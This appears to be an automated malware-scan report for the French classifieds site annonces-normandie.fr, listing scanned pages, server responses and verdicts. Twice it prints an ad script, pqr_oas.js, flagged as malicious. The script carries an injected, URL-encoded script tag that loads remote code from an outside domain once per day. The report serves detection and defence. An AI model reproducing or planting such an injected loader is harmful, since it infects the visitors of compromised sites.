Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=annonces-normandie.fr
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://annonces-normandie.fr/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 09:51:29 GMT Location: http://www.annonces-normandie.fr/ Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.14 Content-Length: 378 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.annonces-normandie.fr/ | 200 OK Content-Length: 22749 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.annonces.paris-normandie.fr ...[1211 bytes skipped]... ta name="y_key" content="" /> <meta name="msvalidate.01" content="" /> <link rel="SHORTCUT ICON" href="http://www.annonces-normandie.fr/images/favicon.ico" type="image/x-icon" /> <link rel="alternate" type="application/rss+xml" title="S'abonner à annonces-normandie.fr" href="http://www.annonces-normandie.fr/index.php/pqractu/default/rss"> <link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/default_css.css" /> <link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/default_css_print.css" media="print" /> <link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/lightbox/highslide.css" /> <script type="text/javascript" src="http://www.annonces.paris-normandie.fr/js/default_js.js" ></script> <script type="text/javascript"> ...[2803 bytes skipped]... | ||
http://www.annonces.paris-normandie.fr/js/default_js.js | 200 OK Content-Length: 80104 Content-Type: application/x-javascript | suspicious |
Page code contains blacklisted domain: www.annonces-normandie.fr // centered popup function
function ouvrir(l,h,url) { hauteur=Math.round((screen.availHeight-h)/2); largeur=Math.round((screen.availWidth-l)/2); window.open(url, "site"+l+h, "toolbar=0,location=0,directories=0,status=0, scrollbars=yes,resizable=0,menubar=0,top="+hauteur+",left="+largeur+",width="+l+",height="+h); } // object selection function function MM_findObj(n, d) { //v4.01 var p,i,x; if(!d) d=docu ...[4206 bytes skipped]... | ||
http://www.annonces.paris-normandie.fr/js/pqr_oas.js | 200 OK Content-Length: 1813 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890'; OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11); function OAS_NORMAL(pos) { document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>'); document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + else OAS_NORMAL(pos); } if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports:
| ||
http://www.annonces.paris-normandie.fr/js/fonctions.js | 200 OK Content-Length: 5782 Content-Type: application/x-javascript | clean |
http://www.annonces.paris-normandie.fr/js/xiti.js | 200 OK Content-Length: 11791 Content-Type: application/x-javascript | clean |
http://annonces-normandie.fr/?Copix=3ae7d275cf23e0727f1505e97bc6f79e | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 09:51:31 GMT Location: http://www.annonces-normandie.fr/?Copix=3ae7d275cf23e0727f1505e97bc6f79e Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.14 Content-Length: 417 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.annonces-normandie.fr/?copix=3ae7d275cf23e0727f1505e97bc6f79e | 200 OK Content-Length: 22792 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.annonces.paris-normandie.fr ...[1211 bytes skipped]... ta name="y_key" content="" /> <meta name="msvalidate.01" content="" /> <link rel="SHORTCUT ICON" href="http://www.annonces-normandie.fr/images/favicon.ico" type="image/x-icon" /> <link rel="alternate" type="application/rss+xml" title="S'abonner à annonces-normandie.fr" href="http://www.annonces-normandie.fr/index.php/pqractu/default/rss"> <link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/default_css.css" /> <link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/default_css_print.css" media="print" /> <link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/lightbox/highslide.css" /> <script type="text/javascript" src="http://www.annonces.paris-normandie.fr/js/default_js.js" ></script> <script type="text/javascript"> ...[2803 bytes skipped]... | ||
http://www.annonces-normandie.fr/?Copix=458557ff8acfada2b289dea8526bc83b | 200 OK Content-Length: 22749 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.annonces.paris-normandie.fr ...[1211 bytes skipped]... ta name="y_key" content="" /> <meta name="msvalidate.01" content="" /> <link rel="SHORTCUT ICON" href="http://www.annonces-normandie.fr/images/favicon.ico" type="image/x-icon" /> <link rel="alternate" type="application/rss+xml" title="S'abonner à annonces-normandie.fr" href="http://www.annonces-normandie.fr/index.php/pqractu/default/rss"> <link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/default_css.css" /> <link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/default_css_print.css" media="print" /> <link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/lightbox/highslide.css" /> <script type="text/javascript" src="http://www.annonces.paris-normandie.fr/js/default_js.js" ></script> <script type="text/javascript"> ...[2803 bytes skipped]... | ||
http://www.annonces-normandie.fr/vitrines/liste-professionnels?selectedMenu=120 | 200 OK Content-Length: 26247 Content-Type: text/html | clean |
http://www.annonces-normandie.fr/js/default_js.js | 200 OK Content-Length: 80104 Content-Type: application/x-javascript | clean |
http://www.annonces-normandie.fr/js/pqr_oas.js | 200 OK Content-Length: 1813 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890'; OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11); function OAS_NORMAL(pos) { document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>'); document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + else OAS_NORMAL(pos); } if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports:
| ||
http://www.annonces-normandie.fr/js/fonctions.js | 200 OK Content-Length: 5782 Content-Type: application/x-javascript | clean |
http://www.annonces-normandie.fr/js/xiti.js | 200 OK Content-Length: 11791 Content-Type: application/x-javascript | clean |
http://www.annonces-normandie.fr/vitrines/?Copix=b8513612a78f109ce08769b10389c665 | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Mon, 15 Sep 2014 09:51:34 GMT Pragma: no-cache Location: cms/6 Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.14 Content-Length: 0 Content-Type: text/html; charset=iso-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT X-Powered-By: PHP/5.2.14 | clean |
http://www.annonces-normandie.fr/vitrines/cms/6 | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Mon, 15 Sep 2014 09:51:34 GMT Pragma: no-cache Location: cms/6 Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.14 Content-Length: 0 Content-Type: text/html; charset=iso-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: Copix=3f20c29d9232fa870f1083f725a9dacb; path=/ X-Powered-By: PHP/5.2.14 | clean |
http://www.annonces-normandie.fr/vitrines/cms/cms/6 | 200 OK Content-Length: 1436 Content-Type: text/html | clean |
http://www.annonces-normandie.fr/vitrines/cms/cms/function.array-merge | 200 OK Content-Length: 1436 Content-Type: text/html | clean |
http://www.annonces-normandie.fr/vitrines/cms/cms/function.session-start | 200 OK Content-Length: 1436 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: annonces-normandie.fr
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 15 Sep 2014 09:51:29 GMT
Location: http://www.annonces-normandie.fr/
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.14
Content-Length: 378
Content-Type: text/html; charset=iso-8859-1
...378 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: annonces-normandie.fr
Referer: http://www.google.com/search?q=annonces-normandie.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.